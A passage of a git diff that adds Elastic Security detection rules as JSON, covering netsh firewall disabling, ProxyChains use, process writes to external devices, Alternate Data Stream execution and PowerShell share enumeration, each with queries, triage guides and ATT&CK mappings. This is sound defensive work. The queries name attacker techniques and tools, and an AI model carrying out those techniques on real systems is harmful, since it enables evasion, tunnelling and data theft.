"Elastic" + ], + "description": "Identifies use of the netsh.exe to disable or weaken the local firewall. Attackers will use this command line tool to disable the firewall during troubleshooting or to enable network mobility.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disable Windows Firewall Rules via Netsh", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Firewall Rules via Netsh\n\nThe Windows Defender Firewall is a native component which provides host-based, two-way network traffic filtering for a device, and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing troubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"netsh.exe\" and\n (\n (process.args : \"disable\" and process.args : \"firewall\" and process.args : \"set\") or\n (process.args : \"advfirewall\" and process.args : \"off\" and process.args : \"state\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "4b438734-3793-4fda-bd42-ceeada0be8f9_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_3.json b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_3.json new file mode 100644 index 00000000000..f1266166585 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_3.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the ProxyChains utility. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ProxyChains Activity", + "note": "## Triage and analysis\n\n### Investigating ProxyChains Activity\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for processes spawned through `proxychains` by analyzing `proxychains` process execution.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Utility Launched via ProxyChains - 6ace94ba-f02c-4d55-9f53-87d99b6f9af4\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"proxychains\"\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4b868f1f-15ff-4ba3-8c11-d5a7a6356d37", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_4.json b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_4.json new file mode 100644 index 00000000000..4bb18b56908 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_4.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the ProxyChains utility. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ProxyChains Activity", + "note": "## Triage and analysis\n\n### Investigating ProxyChains Activity\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for processes spawned through `proxychains` by analyzing `proxychains` process execution.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Utility Launched via ProxyChains - 6ace94ba-f02c-4d55-9f53-87d99b6f9af4\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"proxychains\"\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4b868f1f-15ff-4ba3-8c11-d5a7a6356d37", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_3.json b/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_3.json new file mode 100644 index 00000000000..90028a29094 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_3.json @@ -0,0 +1,60 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration.", + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_rare_process_writing_to_external_device", + "name": "Unusual Process Writing Data to an External Device", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "4b95ecea-7225-4690-9938-2a2c0bad9c99", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. \n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the Elastic Defend integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1052", + "name": "Exfiltration Over Physical Medium", + "reference": "https://attack.mitre.org/techniques/T1052/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "4b95ecea-7225-4690-9938-2a2c0bad9c99_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_108.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_108.json new file mode 100644 index 00000000000..bc19b900a3e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_108.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes running from an Alternate Data Stream. This is uncommon for legitimate processes and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process Execution Path - Alternate Data Stream", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"?:\\\\*:*\" and process.args_count == 1\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "4bd1c1af-79d4-4d37-9efa-6e0240640242_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_109.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_109.json new file mode 100644 index 00000000000..d7bb0561056 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_109.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes running from an Alternate Data Stream. This is uncommon for legitimate processes and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process Execution Path - Alternate Data Stream", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"?:\\\\*:*\" and process.args_count == 1\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "4bd1c1af-79d4-4d37-9efa-6e0240640242_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_9.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_9.json new file mode 100644 index 00000000000..92f0b4b6838 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_9.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Share Enumeration Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell Share Enumeration Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to enumerate shares to search for sensitive data like documents, scripts, and other kinds of valuable data for encryption, exfiltration, and lateral movement.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command line logs that indicate that imported functions were run.\n - Evaluate which information was potentially mapped and accessed by the attacker.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"Invoke-ShareFinder\" or\n \"Invoke-ShareFinderThreaded\" or\n (\n \"shi1_netname\" and\n \"shi1_remark\"\n ) or\n (\n \"NetShareEnum\" and\n \"NetApiBufferFree\"\n )\n ) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://www.advintel.io/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: 